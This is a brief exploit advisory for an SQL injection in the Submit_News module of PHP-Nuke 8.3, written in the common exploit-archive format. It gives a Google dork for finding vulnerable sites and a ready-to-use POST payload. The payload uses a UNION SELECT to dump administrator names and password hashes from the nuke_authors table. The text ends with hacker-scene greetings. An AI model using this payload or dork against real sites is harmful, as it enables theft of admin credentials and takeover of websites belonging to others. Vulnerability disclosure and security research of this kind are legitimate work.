# title : phpnuke 8.3 sql injection vulnerability
# Exploit Title: phpnuke 8.3 submit news module sql injection vulnerability
# Google Dork: inurl:modules.php?name=Submit_News
# Date: 5/24/2014
# Exploit Author: ali ahmady -- Iranian Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: phpnuke.org
# Software Link: -
# Version: 8.3
# Tested on: windows - linux

Submit_News module is vulnerable to sqli at review post step

subject=whatever&topics%5B%5D=-1' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+&alanguage=english&story=whatever

tools used : live http headers

greets : b0x , Phantom_X , VIRkid , Mohamm@d , milad22 , zeus REKCAH